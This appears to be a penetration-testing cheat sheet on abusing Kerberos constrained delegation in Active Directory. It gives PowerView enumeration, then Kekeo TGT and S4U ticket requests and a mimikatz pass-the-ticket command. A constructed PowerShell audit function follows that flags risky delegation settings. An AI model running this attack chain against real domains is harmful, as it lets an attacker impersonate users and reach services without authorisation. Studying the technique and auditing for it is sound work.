# CONSTRAINED DELEGATION

Enumerate user accounts with constrained delegation enabled (PowerView):

```
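# Full objects for user accounts configured for constrained delegation
Get-DomainUser -TrustedToAuth

# Account names only
Get-DomainUser -TrustedToAuth | Select -ExpandProperty samaccountname

# Account names with their userAccountControl flags
Get-DomainUser -TrustedToAuth | Select samaccountname,useraccountcontrol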
```

Use Kekeo to request a TGT for the service account configured for constrained delegation:

```
tgt::ask /user:<CONSTRAINED SERVICE> /domain:<DOMAIN> /rc4:<NTLM>
```

Request a TGS for the target service using the constrained service's TGT:

```
tgs::s4u /tgt:<TGT PATH> /user:<USERNAME> /service:<SPN>
```

Perform a pass-the-ticket attack with mimikatz to gain access:

```
Invoke-Mimikatz -Command '"kerberos::ptt <TGS PATH>"'
```
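
The enumeration step above selects `useraccountcontrol`. As an added example (not from the original page and not part of PowerView), this PowerShell function decodes the delegation-related bits and lists privileged accounts that are not marked as sensitive. The function name `Get-DelegationAudit`, the sample accounts and the `corp.example` SPNs are constructed; the input is assumed to carry `userAccountControl`, `msDS-AllowedToDelegateTo` and `adminCount`.

```powershell
# Added example, not from the original page; all sample accounts are constructed.
# Documented userAccountControl bit values relevant to delegation:
$TRUSTED_FOR_DELEGATION         = 0x80000    # unconstrained delegation
$NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition allowed

function Get-DelegationAudit {
    param([Parameter(Mandatory)][object[]]$Account)

    foreach ($a in $Account) {
        $uac  = [int]$a.userAccountControl
        $spns = @($a.'msDS-AllowedToDelegateTo' | Where-Object { $_ })

        $type = if ($uac -band $TRUSTED_FOR_DELEGATION) {
            'Unconstrained'
        } elseif ($spns.Count -gt 0 -and ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)) {
            'Constrained, any protocol'
        } elseif ($spns.Count -gt 0) {
            'Constrained, Kerberos only'
        } else {
            'None'
        }

        [pscustomobject]@{
            SamAccountName = $a.samAccountName
            Delegation     = $type
            AllowedTo      = $spns -join ', '
            Privileged     = ($a.adminCount -eq 1)
            Delegable      = -not ($uac -band $NOT_DELEGATED)
        }
    }
}

# Constructed sample input (0x200 = NORMAL_ACCOUNT).
$sample = @(
    [pscustomobject]@{ samAccountName = 'svc-web'; adminCount = 0; userAccountControl = 0x1000200; 'msDS-AllowedToDelegateTo' = @('cifs/fs01.corp.example') }
    [pscustomobject]@{ samAccountName = 'svc-sql'; adminCount = 0; userAccountControl = 0x200; 'msDS-AllowedToDelegateTo' = @('MSSQLSvc/db01.corp.example:1433') }
    [pscustomobject]@{ samAccountName = 'adm-alice'; adminCount = 1; userAccountControl = 0x200 }
    [pscustomobject]@{ samAccountName = 'adm-bob'; adminCount = 1; userAccountControl = 0x100200 }
)
$report = Get-DelegationAudit -Account $sample

# 1. Accounts that can delegate, and the SPNs they may delegate to.
$report | Where-Object { $_.Delegation -ne 'None' } |
    Format-Table SamAccountName, Delegation, AllowedTo -AutoSize

# 2. Privileged accounts whose identity a delegating service could still carry;
#    set "sensitive and cannot be delegated" or add them to Protected Users.
$report | Where-Object { $_.Privileged -and $_.Delegable } |
    Format-Table SamAccountName -AutoSize
```

In a domain, the same properties can be supplied by `Get-ADUser -Filter * -Properties userAccountControl,adminCount,msDS-AllowedToDelegateTo` from the ActiveDirectory module.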
